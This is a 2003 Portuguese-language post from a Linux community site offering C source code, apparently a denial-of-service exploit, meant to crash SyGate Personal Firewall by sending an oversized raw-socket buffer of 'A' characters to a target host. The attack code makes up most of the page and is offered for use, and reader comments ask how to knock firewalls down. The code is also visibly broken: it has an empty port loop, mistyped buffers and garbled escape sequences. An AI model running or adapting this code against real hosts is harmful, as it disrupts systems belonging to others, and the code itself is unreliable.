Derrubando SyGate Profissional Firewall !

Publicado por Denis Zanin 02/07/2003

[ Hits: 10.612 ]

Download touchdown.c




Esse exploit eu fiz há um bom tempo, nao lembro em que versao ele estava... !
E nem sei se está funcionando perfeitamente, hehe... !
Mas mais vale o propósito educacional, uma bela aula sobre sockets em C !

Falowsss !
[]s

  



Esconder código-fonte

/*
Derrubando SyGate Personal Firewall
by vir0se - virose@bol.com.br
*/

#include <stdio.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>

#define    A            0x41
#define PORTA_INICIAL     1
#define PORTA_FINAL     7000

int main (int argc, char **argv)
{
int SockFD, addrlen, bsent, i, porta_inicial, porta_final, portas;
struct sockaddr_in UDPSock;
char *buf[1024];

printf("\n\n{FONTE}33[1;32m DERRUBANDO SYGATE PERSONAL FIREWALL \n");
printf("{FONTE}33[1;33m                       BY vir0se.....{FONTE}33[9;0m\n\n");

if(argc==1){
printf("{FONTE}33[1;34mUsando: %s [servidor] [porta inicial] [porta final]{FONTE}33[9;0m\n\n\n",argv[0]);
exit(1);
}

if (argc > 1){
porta_inicial = PORTA_INICIAL;
porta_final = PORTA_FINAL;
}
if (argc > 2)
{
porta_inicial = atoi (argv[2]);
porta_final = atoi (argv[3]);
}

for (portas = porta_inicial; portas < porta_final; portas++);

SockFD=socket(AF_INET, SOCK_RAW, 3);

UDPSock.sin_family=AF_INET;
UDPSock.sin_addr.s_addr=inet_addr(argv[1]);
UDPSock.sin_port=htons(53);     

bzero(&(UDPSock.sin_zero), 8);

if (connect(SockFD,(struct sockaddr *)&UDPSock, sizeof(UDPSock)) < 0){
fprintf(stderr,"Connect error\n");
exit(-1);
}

bzero(buf,sizeof(buf));

printf ("\n\n{FONTE}33[1;31m ENVIANDO BUFFER OVERFLOW... SEGURA ESSA %s ...{FONTE}33[9;0m\n\n\n", argv[1]);

for(i=0; i < 1024; i++)
buf[i] = (char *) A;
buf[1024 -1] = '{FONTE}';

if(bsent=sendto(SockFD,buf,strlen(buf),0,(struct sockaddr *)&UDPSock, sizeof(struct sockaddr_in)) < 0){
printf("erro write()\n");
close(SockFD);
exit(-1);
}

printf("DADOS ENVIADOS COM SUUUUUUUUUUU... CESSOOO... .\nDados Enviados: %i\n\n\n",bsent);
close(SockFD);
return 0;
}

Scripts recomendados

Cálculo de logaritmo de um número por um terceiro método em C

Sistema básico de cadastro usando Listas Encadeadas

Rotina para controle de portas paralelas em C. (biblioteca LP.h)

Estrutura Simples (REGISTRO)

Analisador Léxico 0.5


  

Comentários
[1] Comentário enviado por vir0se em 02/07/2003 - 14:36h

Fala galera !!! Essa contribuicão de script veio com 2 erros, ai vai as correcões:

1) Nome do Firewall: Nao é SyGate Profissional Firewall e sim SyGate Personal Firewall !
Esse é um exploit para a versao gratuita do firewall . É muito provavel que já foi corrigida a falha !

2) Código-fonte: Se voces forem testar o script, é melhor que façam o download dele invés de
copiar e colar, na seção CODIGO FONTE, pois sem querer apareceu diversos erros... !

Falows !

[2] Comentário enviado por rsanque em 18/03/2004 - 12:18h

Ola, Gostaria de esclarecer uma duvida. Rodei o touchdown.c mas acontece q ele nao envia dados
nenhum para o servidor que estou tentando testar...

O que pode estar acontecendo... eu coloco da seguinte forma.
./sygate 200.xxx.xxx.xxx 1 7000

esta correto.
[]s,
Rafael

[3] Comentário enviado por dark_slack em 07/09/2004 - 02:08h

Como e que faz pra derrubar um firewall desses? qual o comando? e possivel eu derrubar esse firewall sem tar em rede?


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner
Linux banner
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts